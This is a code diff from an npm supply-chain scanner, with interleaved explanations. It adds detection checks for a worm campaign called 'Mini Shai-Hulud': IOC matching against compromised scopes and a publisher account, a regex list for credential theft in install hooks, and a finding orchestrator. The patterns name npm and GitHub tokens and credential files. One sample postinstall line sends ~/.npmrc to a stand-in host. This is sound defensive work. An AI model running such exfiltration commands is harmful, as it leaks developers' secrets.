+
case 'sha512': {
|
|
71
|
+
if (ioc.value === sha512 && ioc.package === pkgName) {
|
|
72
|
+
matches.push({ type: 'sha512', value: sha512, wave: ioc.wave, package: pkgName });
|
|
73
|
+
}
|
|
74
|
+
break;
|
|
75
|
+
}
|
|
76
|
+
|
|
77
|
+
case 'publisherAccount': {
|
|
78
|
+
if (ioc.value === publisherAccount) {
|
|
79
|
+
const pubTime = new Date(timeMap?.[pkgVersion]).getTime();
|
|
80
|
+
const windowStart = new Date(ioc.compromiseWindowStart).getTime();
|
|
81
|
+
const windowEnd = ioc.compromiseWindowEnd
|
|
82
|
+
? new Date(ioc.compromiseWindowEnd).getTime()
|
|
83
|
+
: Infinity;
|
|
84
|
+
|
|
85
|
+
if (!Number.isNaN(pubTime) && pubTime >= windowStart && pubTime <= windowEnd) {
|
|
86
|
+
matches.push({ type: 'publisherAccount', value: publisherAccount, wave: ioc.wave });
|
|
87
|
+
}
|
|
88
|
+
}
|
|
89
|
+
break;
|
|
90
|
+
}
|
|
91
|
+
}
|
|
92
|
+
}
|
|
93
|
+
|
|
94
|
+
return { triggered: matches.length > 0, matches };
|
|
95
|
+
}
|
|
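Two details of the IOC matcher in this file are easy to miss: the `packageScope` case uses a bare `startsWith`, and a `publisherAccount` entry with a null end date is treated as an open-ended window. The sketch below isolates both. `prefixMatches` restates the behaviour shown in the diff, while `scopeMatches` is a hypothetical stricter variant that is not part of the package; the package names in the usage lines are invented.

```javascript
// Behaviour shown in the diff: plain prefix comparison.
function prefixMatches(pkgName, scope) {
  return pkgName.startsWith(scope);
}

// Hypothetical stricter variant: require the scope separator as well.
function scopeMatches(pkgName, scope) {
  return pkgName.startsWith(scope + '/');
}

// Publisher window test restated from the diff: a null end means "no end yet".
function inCompromiseWindow(publishedAt, startIso, endIso) {
  const t = new Date(publishedAt).getTime();
  const start = new Date(startIso).getTime();
  const end = endIso ? new Date(endIso).getTime() : Infinity;
  return !Number.isNaN(t) && t >= start && t <= end;
}

// Invented package names for illustration.
console.log(prefixMatches('@tanstack-extras/foo', '@tanstack')); // unrelated scope, still matches
console.log(scopeMatches('@tanstack-extras/foo', '@tanstack'));
console.log(scopeMatches('@tanstack/query', '@tanstack'));
console.log(inCompromiseWindow('2026-05-21T08:00:00.000Z', '2026-05-20T00:00:00.000Z', null));
```

With the bare prefix comparison, any scope whose name merely begins with an IOC scope string is reported as a match, which may or may not be intended. Note also that a scope match, as written in the diff, applies to every version of every package in the scope, since `maliciousVersionRanges` is not consulted by `checkIOC`.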
@@ -0,0 +1,38 @@
|
|
|
1
|
+
const EXFIL_PATTERNS = [
|
|
2
|
+
/NPM_TOKEN|NODE_AUTH_TOKEN|GH_TOKEN|GITHUB_TOKEN|npm_token|node_auth_token/i,
|
|
3
|
+
/~\/(\.npmrc|\.gitconfig|\.aws\/credentials)/,
|
|
4
|
+
/\/run\/secrets\//,
|
|
5
|
+
/\$GITHUB_ENV/,
|
|
6
|
+
/process\.env\.(NPM_TOKEN|NODE_AUTH_TOKEN|GH_TOKEN|GITHUB_TOKEN)/,
|
|
7
|
+
/Buffer\.from\s*\([^)]*\)\s*\.\s*toString\s*\(\s*['"]base64['"]\s*\)/,
|
|
8
|
+
/\batob\s*\(/,
|
|
9
|
+
/\bbtoa\s*\(/,
|
|
10
|
+
];
|
|
11
|
+
|
|
12
|
+
const SUSPICIOUS_SCRIPTS = ['preinstall', 'install', 'postinstall', 'prepare'];
|
|
13
|
+
|
|
14
|
+
const MAX_SNIPPET_LENGTH = 200;
|
|
15
|
+
|
|
16
|
+
function truncateSnippet(text) {
|
|
17
|
+
if (text.length <= MAX_SNIPPET_LENGTH) return text;
|
|
18
|
+
return text.slice(0, MAX_SNIPPET_LENGTH - 3) + '...';
|
|
19
|
+
}
|
|
20
|
+
|
|
21
|
+
export function checkTokenExfil(allFiles, pkgJson) {
|
|
22
|
+
const scripts = pkgJson?.scripts || {};
|
|
23
|
+
const snippets = [];
|
|
24
|
+
|
|
25
|
+
for (const hook of SUSPICIOUS_SCRIPTS) {
|
|
26
|
+
const scriptContent = scripts[hook];
|
|
27
|
+
if (!scriptContent) continue;
|
|
28
|
+
|
|
29
|
+
for (const pattern of EXFIL_PATTERNS) {
|
|
30
|
+
if (pattern.test(scriptContent)) {
|
|
31
|
+
snippets.push(truncateSnippet(scriptContent));
|
|
32
|
+
break;
|
|
33
|
+
}
|
|
34
|
+
}
|
|
35
|
+
}
|
|
36
|
+
|
|
37
|
+
return { triggered: snippets.length > 0, snippets };
|
|
38
|
+
}
|
|
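To see what the lifecycle-script scan in this file does and does not catch, it helps to run a few of its patterns against sample `scripts` entries. The sketch below uses a subset of the patterns from the diff; `flaggedHooks` is a hypothetical helper and the script bodies and URL are invented.

```javascript
// A subset of the patterns from the diff.
const PATTERNS = [
  /NPM_TOKEN|NODE_AUTH_TOKEN|GH_TOKEN|GITHUB_TOKEN/i,
  /~\/(\.npmrc|\.gitconfig|\.aws\/credentials)/,
  /\batob\s*\(/,
];

// Hook list copied from the diff.
const HOOKS = ['preinstall', 'install', 'postinstall', 'prepare'];

// Hypothetical helper: names of lifecycle hooks whose body matches a pattern.
function flaggedHooks(scripts) {
  return HOOKS.filter(hook => {
    const body = scripts[hook];
    return Boolean(body) && PATTERNS.some(p => p.test(body));
  });
}

// Invented package.json scripts.
const scripts = {
  postinstall: 'curl -d "$(cat ~/.npmrc)" https://collector.example.test',
  prepare: 'husky install',
  test: 'echo $NPM_TOKEN', // not a lifecycle hook in HOOKS, so never inspected
};
console.log(flaggedHooks(scripts));
```

As written in the diff, `checkTokenExfil` receives `allFiles` but only inspects `pkgJson.scripts`, so a hook such as `node setup.js` whose payload lives in a separate file would not be flagged by this check on its own.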
@@ -0,0 +1,80 @@
|
|
|
1
|
+
import { checkBurstPublish } from './d1-burst-publish.js';
|
|
2
|
+
import { checkSiblingCompromise, clearSiblingCache } from './d2-sibling-compromise.js';
|
|
3
|
+
import { checkSlsaMismatch } from './d3-slsa-mismatch.js';
|
|
4
|
+
import { checkMaintainerAnomaly } from './d4-maintainer-anomaly.js';
|
|
5
|
+
import { checkIOC } from './d5-ioc-check.js';
|
|
6
|
+
import { checkTokenExfil } from './d6-token-exfil.js';
|
|
7
|
+
|
|
8
|
+
export async function scan(pkgJson, files = [], registryMeta = null, allFiles = null) {
|
|
9
|
+
const config = {};
|
|
10
|
+
|
|
11
|
+
const burstResult = await checkBurstPublish(registryMeta, config);
|
|
12
|
+
const maintainerResult = await checkMaintainerAnomaly(registryMeta, config);
|
|
13
|
+
|
|
14
|
+
const pkgName = pkgJson?.name || '';
|
|
15
|
+
const pkgVersion = pkgJson?.version || '';
|
|
16
|
+
const sha512 = registryMeta?.versions?.[pkgVersion]?.dist?.integrity || null;
|
|
17
|
+
const publisherAccount = registryMeta?.versions?.[pkgVersion]?._npmUser?.name || null;
|
|
18
|
+
const timeMap = registryMeta?.time || {};
|
|
19
|
+
|
|
20
|
+
const iocResult = await checkIOC(pkgName, pkgVersion, sha512, publisherAccount, timeMap);
|
|
21
|
+
const exfilResult = checkTokenExfil(allFiles || files, pkgJson);
|
|
22
|
+
|
|
23
|
+
let siblingResult = { triggered: false };
|
|
24
|
+
let slsaResult = { triggered: false };
|
|
25
|
+
|
|
26
|
+
if (burstResult.triggered) {
|
|
27
|
+
siblingResult = await checkSiblingCompromise(pkgJson, config);
|
|
28
|
+
slsaResult = await checkSlsaMismatch(pkgName, pkgVersion, burstResult, timeMap, config);
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
const triggeredChecks = [];
|
|
32
|
+
if (burstResult.triggered) triggeredChecks.push('D1_BURST');
|
|
33
|
+
if (siblingResult.triggered) triggeredChecks.push('D2_SIBLING');
|
|
34
|
+
if (slsaResult.triggered) triggeredChecks.push('D3_SLSA');
|
|
35
|
+
if (maintainerResult.triggered) triggeredChecks.push('D4_MAINTAINER');
|
|
36
|
+
if (iocResult.triggered) triggeredChecks.push('D5_IOC');
|
|
37
|
+
if (exfilResult.triggered) triggeredChecks.push('D6_EXFIL');
|
|
38
|
+
|
|
39
|
+
if (triggeredChecks.length === 0) return [];
|
|
40
|
+
|
|
41
|
+
let waveAttribution = 'unknown';
|
|
42
|
+
if (pkgName.startsWith('@tanstack')) {
|
|
43
|
+
waveAttribution = 'wave1-tanstack';
|
|
44
|
+
} else if (pkgName.startsWith('@antv')) {
|
|
45
|
+
waveAttribution = 'wave2-antv';
|
|
46
|
+
} else if (iocResult.matches && iocResult.matches.length > 0) {
|
|
47
|
+
const waves = [...new Set(iocResult.matches.map(m => m.wave))];
|
|
48
|
+
if (waves.length === 1) {
|
|
49
|
+
waveAttribution = waves[0] === 1 ? 'wave1-tanstack' : 'wave2-antv';
|
|
50
|
+
}
|
|
51
|
+
}
|
|
52
|
+
|
|
53
|
+
const isCritical = slsaResult.triggered || iocResult.triggered;
|
|
54
|
+
|
|
55
|
+
const evidence = {
|
|
56
|
+
campaign: 'MINI_SHAI_HULUD',
|
|
57
|
+
waveAttribution,
|
|
58
|
+
triggeredChecks,
|
|
59
|
+
burstWindow: burstResult.triggered
|
|
60
|
+
? { start: burstResult.windowStart, end: burstResult.windowEnd, versionCount: burstResult.versionCount }
|
|
61
|
+
: null,
|
|
62
|
+
siblingPackages: siblingResult.triggered
|
|
63
|
+
? siblingResult.results.flatMap(r => r.siblingPackages)
|
|
64
|
+
: null,
|
|
65
|
+
attestationAnomalies: slsaResult.triggered ? slsaResult.anomalies : null,
|
|
66
|
+
iocMatches: iocResult.triggered ? iocResult.matches : null,
|
|
67
|
+
installScriptSnippets: exfilResult.triggered ? exfilResult.snippets : null,
|
|
68
|
+
};
|
|
69
|
+
|
|
70
|
+
return [{
|
|
71
|
+
id: 'MINI_SHAI_HULUD',
|
|
72
|
+
severity: isCritical ? 'critical' : 'high',
|
|
73
|
+
title: 'Mini Shai-Hulud worm campaign',
|
|
74
|
+
description: `${triggeredChecks.length} signal(s): ${triggeredChecks.join(', ')}`,
|
|
75
|
+
evidence: JSON.stringify(evidence),
|
|
76
|
+
mitigation: 'Revoke all npm tokens immediately. Rotate CI/CD secrets. Audit maintainer access on all scoped packages. Review recent version publish history for anomalous bursts. Check for postinstall scripts accessing credentials or environment variables. If Wave 1 (TanStack scope): inspect GitHub Actions workflow logs for unauthorized build steps. If Wave 2 (atool/AntV scope): rotate all npm tokens associated with @antv/* packages.',
|
|
77
|
+
}];
|
|
78
|
+
}
|
|
79
|
+
|
|
80
|
+
export { clearSiblingCache } from './d2-sibling-compromise.js';
|
|
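The finding returned by `scan` carries its details in `evidence` as a JSON string, and its severity depends only on whether D3 or D5 fired. A minimal sketch of a consumer follows. `summarizeFinding` and `severityFor` are hypothetical names, and the sample finding is hand-built to match the shape in the diff rather than produced by the real scanner.

```javascript
// Hypothetical consumer: `evidence` is a string in the diff, so parse it first.
function summarizeFinding(finding) {
  const evidence = JSON.parse(finding.evidence);
  return {
    severity: finding.severity,
    wave: evidence.waveAttribution,
    checks: evidence.triggeredChecks,
    siblings: evidence.siblingPackages ?? [], // null when D2 did not fire
  };
}

// Severity rule restated from the diff: D3 (SLSA) or D5 (IOC) means critical.
function severityFor(triggeredChecks) {
  const critical =
    triggeredChecks.includes('D3_SLSA') || triggeredChecks.includes('D5_IOC');
  return critical ? 'critical' : 'high';
}

// Hand-built finding for illustration.
const checks = ['D1_BURST', 'D6_EXFIL'];
const finding = {
  id: 'MINI_SHAI_HULUD',
  severity: severityFor(checks),
  evidence: JSON.stringify({
    waveAttribution: 'unknown',
    triggeredChecks: checks,
    siblingPackages: null,
  }),
};
const summary = summarizeFinding(finding);
console.log(summary);
```

Since D2 and D3 only run when D1 has triggered, a package that matches an IOC but shows no burst is still reported as critical through D5 alone, with `burstWindow` and `siblingPackages` left null in the evidence.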
@@ -0,0 +1,47 @@
|
|
|
1
|
+
{
|
|
2
|
+
"lastUpdated": "2026-05-24T00:00:00.000Z",
|
|
3
|
+
"waves": {
|
|
4
|
+
"wave1": {
|
|
5
|
+
"id": "mini-shai-hulud-wave1",
|
|
6
|
+
"description": "TanStack CI/CD hijack (mid-May 2026) — 84 malicious versions across 42 packages in ~6 minutes via compromised GitHub Actions CI. Forged SLSA BL3 provenance attestations.",
|
|
7
|
+
"windowMinutes": 6,
|
|
8
|
+
"iocs": [
|
|
9
|
+
{
|
|
10
|
+
"type": "packageScope",
|
|
11
|
+
"value": "@tanstack",
|
|
12
|
+
"maliciousVersionRanges": [],
|
|
13
|
+
"notes": "Seed IOC — update from threat intel feed. Affected: @tanstack/router, @tanstack/react-router, @tanstack/query, @tanstack/form, @tanstack/store, @tanstack/virtual, @tanstack/ranger, @tanstack/table."
|
|
14
|
+
}
|
|
15
|
+
]
|
|
16
|
+
},
|
|
17
|
+
"wave2": {
|
|
18
|
+
"id": "mini-shai-hulud-wave2",
|
|
19
|
+
"description": "AntV/atool maintainer account compromise (late May 2026) — 600+ malicious versions across 300+ packages in ~22 minutes. ~16M weekly download blast radius.",
|
|
20
|
+
"windowMinutes": 22,
|
|
21
|
+
"iocs": [
|
|
22
|
+
{
|
|
23
|
+
"type": "publisherAccount",
|
|
24
|
+
"value": "atool",
|
|
25
|
+
"compromiseWindowStart": "2026-05-20T00:00:00.000Z",
|
|
26
|
+
"compromiseWindowEnd": null,
|
|
27
|
+
"notes": "Seed IOC — compromised @antv/atool maintainer account. Update compromise window from threat intel."
|
|
28
|
+
},
|
|
29
|
+
{
|
|
30
|
+
"type": "packageScope",
|
|
31
|
+
"value": "@antv",
|
|
32
|
+
"maliciousVersionRanges": [],
|
|
33
|
+
"notes": "Blast radius: @antv/g2, @antv/g6, @antv/x6, @antv/l7, echarts-for-react, timeago.js. Seed IOC — update from threat intel."
|
|
34
|
+
}
|
|
35
|
+
]
|
|
36
|
+
}
|
|
37
|
+
},
|
|
38
|
+
"iocs": [
|
|
39
|
+
{
|
|
40
|
+
"type": "sha512",
|
|
41
|
+
"value": "sha512-AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
|
|
42
|
+
"package": "@antv/g2",
|
|
43
|
+
"wave": 2,
|
|
44
|
+
"notes": "Placeholder sha512 — replace with actual SHA-512 integrity hash from npm dist.integrity of a confirmed malicious version."
|
|
45
|
+
}
|
|
46
|
+
]
|
|
47
|
+
}
|
package/package.json
CHANGED
|
@@ -1,6 +1,6 @@
|
|
|
1
1
|
{
|
|
2
2
|
"name": "@lateos/npm-scan",
|
|
3
|
-
"version": "0.15.
|
|
3
|
+
"version": "0.15.4",
|
|
4
4
|
"description": "Modern npm supply chain security scanner — detects obfuscated payloads, credential stealers, conditional triggers, sandbox evasion, and worm-like propagation. 11 attack types, SBOM, NIST/EU CRA compliance reporting.",
|
|
5
5
|
"main": "backend/index.js",
|
|
6
6
|
"bin": {
|